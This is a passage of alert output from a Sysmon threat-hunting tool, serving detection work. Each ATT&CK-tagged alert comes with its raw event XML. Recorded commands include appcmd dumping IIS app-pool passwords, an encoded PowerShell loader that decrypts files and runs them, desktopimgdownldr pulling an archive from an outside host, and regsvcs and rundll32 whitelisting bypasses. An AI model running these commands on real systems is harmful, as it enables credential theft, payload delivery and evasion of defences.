<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
<Data Name=""ParentProcessId"">7504</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.282154,2019-05-27T05:29:18.282154+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.282154Z"">
</TimeCreated>
<EventRecordID>5919</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.232</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00108C8EFF00</Data>
<Data Name=""ProcessId"">3144</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1593766040.077424,2020-07-03T12:47:20.077424+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-03T08:47:20.037922Z"">
</TimeCreated>
<EventRecordID>305352</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3324"" ThreadID=""4016"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-03 08:47:20.001</Data>
<Data Name=""ProcessGuid"">747F3D96-F098-5EFE-0000-001012E13801</Data>
<Data Name=""ProcessId"">1932</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1CE4-5EFE-0000-0020CC9C0800</Data>
<Data Name=""LogonId"">0x89ccc</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-EF3D-5EFE-0000-0010F3653401</Data>
<Data Name=""ParentProcessId"">5384</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1560582872.809734,2019-06-15T11:14:32.809734+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 4443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-15T07:13:44.106609Z"">
</TimeCreated>
<EventRecordID>7649</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""2088"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-15 07:13:42.577</Data>
<Data Name=""ProcessGuid"">365ABB72-9AA6-5D04-0000-00109C850F00</Data>
<Data Name=""ProcessId"">652</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.13</Data>
<Data Name=""SourceHostname"">IEWIN7</Data>
<Data Name=""SourcePort"">49159</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.0.2.18</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">4443</Data>
<Data Name=""DestinationPortName""></Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-03T20:39:30.254733Z"">
</TimeCreated>
<EventRecordID>8352</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""112"" ThreadID=""2084"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-03 20:39:30.254</Data>
<Data Name=""ProcessGuid"">365ABB72-1282-5D1D-0000-0010DD401B00</Data>
<Data Name=""ProcessId"">2328</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-0A6F-5D1D-0000-0020CA350100</Data>
<Data Name=""LogonId"">0x135ca</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1256-5D1D-0000-0010FB1A1B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\notepad.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-03T20:39:30.254733Z"">
</TimeCreated>
<EventRecordID>8352</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""112"" ThreadID=""2084"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-03 20:39:30.254</Data>
<Data Name=""ProcessGuid"">365ABB72-1282-5D1D-0000-0010DD401B00</Data>
<Data Name=""ProcessId"">2328</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-0A6F-5D1D-0000-0020CA350100</Data>
<Data Name=""LogonId"">0x135ca</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1256-5D1D-0000-0010FB1A1B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\notepad.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-03T20:39:30.254733Z"">
</TimeCreated>
<EventRecordID>8352</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""112"" ThreadID=""2084"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-03 20:39:30.254</Data>
<Data Name=""ProcessGuid"">365ABB72-1282-5D1D-0000-0010DD401B00</Data>
<Data Name=""ProcessId"">2328</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-0A6F-5D1D-0000-0020CA350100</Data>
<Data Name=""LogonId"">0x135ca</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1256-5D1D-0000-0010FB1A1B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\notepad.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436009.341503,2019-07-30T01:33:29.341503+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:28.374373Z"">
</TimeCreated>
<EventRecordID>4917</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:28.222</Data>
<Data Name=""ProcessGuid"">747F3D96-6628-5D3F-0000-001062788800</Data>
<Data Name=""ProcessId"">2040</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.202039,2019-05-27T05:29:18.202039+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.202039Z"">
</TimeCreated>
<EventRecordID>5916</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.161</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010CC8AFF00</Data>
<Data Name=""ProcessId"">2524</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvA